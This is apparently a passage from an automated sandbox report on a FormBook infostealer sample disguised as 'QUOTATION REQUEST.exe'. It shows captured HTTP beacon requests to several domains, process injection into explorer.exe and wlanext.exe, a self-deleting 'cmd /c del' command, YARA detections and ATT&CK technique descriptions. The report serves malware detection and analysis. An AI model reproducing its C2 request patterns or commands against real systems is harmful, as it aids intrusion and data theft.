6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49738	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:17.587124109 CEST	1772	OUT	GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1 Host: www.cannabisllp.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:17.729289055 CEST	1772	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:17 GMT Content-Type: text/html Content-Length: 275 ETag: "6089be8c-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49745	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:28.055273056 CEST	8416	OUT	GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1 Host: www.buffalobooze.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:28.192008018 CEST	8417	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:28 GMT Content-Type: text/html Content-Length: 275 ETag: "608f64c6-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49746	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:33.349997997 CEST	9240	OUT	GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1 Host: www.checkmytradesmanswork.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:33.487457991 CEST	9241	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:33 GMT Content-Type: text/html Content-Length: 275 ETag: "608f64c6-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49747	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:38.629651070 CEST	9241	OUT	GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1 Host: www.inthebeginningshop.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:38.766555071 CEST	9242	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:38 GMT Content-Type: text/html Content-Length: 275 ETag: "6089cf31-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49748	81.17.18.196	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:49.181248903 CEST	9243	OUT	GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1 Host: www.madisonroselove.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:49.240447044 CEST	9243	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 03 May 2021 14:51:48 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=16d8f1b6-ac1f-11eb-818f-5fcb3c45551e; path=/; domain=.madisonroselove.com; expires=Sat, 21 May 2089 18:05:56 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49751	206.189.50.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:59.515070915 CEST	9261	OUT	GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1 Host: www.pedroiniesta.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:59.569699049 CEST	9261	IN	HTTP/1.1 301 Moved Permanently cache-control: public, max-age=0, must-revalidate content-length: 50 content-type: text/plain date: Mon, 03 May 2021 14:34:00 GMT x-language: location: https://www.pedroiniesta.net/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al age: 1079 x-nf-request-id: 71acf9cf-c105-4833-8ef8-2fc039e0c77a server: Netlify x-country: CH Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 64 72 6f 69 6e 69 65 73 74 61 2e 6e 65 74 2f 6e 37 61 64 2f 0a Data Ascii: Redirecting to https://www.pedroiniesta.net/n7ad/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49752	192.185.131.134	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:52:04.990890026 CEST	9262	OUT	GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1 Host: www.freecleanlimpieza.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:52:05.163970947 CEST	9263	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 03 May 2021 14:52:05 GMT Server: Apache Location: https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al Content-Length: 333 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 72 65 65 63 6c 65 61 6e 6c 69 6d 70 69 65 7a 61 2e 63 6f 6d 2f 6e 37 61 64 2f 3f 62 6c 3d 6d 32 48 61 73 66 77 4b 4a 71 4f 6e 69 76 6a 33 33 55 73 75 7a 63 64 69 47 53 66 39 35 68 2f 37 31 52 48 32 31 71 59 45 67 52 36 31 4c 6c 30 63 50 32 6a 46 43 61 51 44 57 43 6d 4b 44 63 36 33 65 37 5a 68 26 61 6d 70 3b 75 54 67 4c 3d 4d 36 41 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49754	46.30.211.38	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:52:15.430581093 CEST	9273	OUT	GET /n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al HTTP/1.1 Host: www.graet.design Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:52:15.504179001 CEST	9274	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 03 May 2021 14:52:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 162 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: QUOTATION REQUEST.exe PID: 4660 Parent PID: 5672

General

Start time:	16:50:14
Start date:	03/05/2021
Path:	C:\Users\user\Desktop\QUOTATION REQUEST.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Imagebase:	0x230000
File size:	745984 bytes
MD5 hash:	64AF41000584694858D0FCC37B1BF69B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: QUOTATION REQUEST.exe PID: 4112 Parent PID: 4660

General

Start time:	16:50:18
Start date:	03/05/2021
Path:	C:\Users\user\Desktop\QUOTATION REQUEST.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\QUOTATION REQUEST.exe
Imagebase:	0xc40000
File size:	745984 bytes
MD5 hash:	64AF41000584694858D0FCC37B1BF69B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3388 Parent PID: 4112

General

Start time:	16:50:21
Start date:	03/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: wlanext.exe PID: 5268 Parent PID: 3388

General

Start time:	16:50:35
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0x1260000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 5784 Parent PID: 5268

General

Start time:	16:50:40
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Imagebase:	0xbc0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5564 Parent PID: 5784

General

Start time:	16:50:41
Start date:	03/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
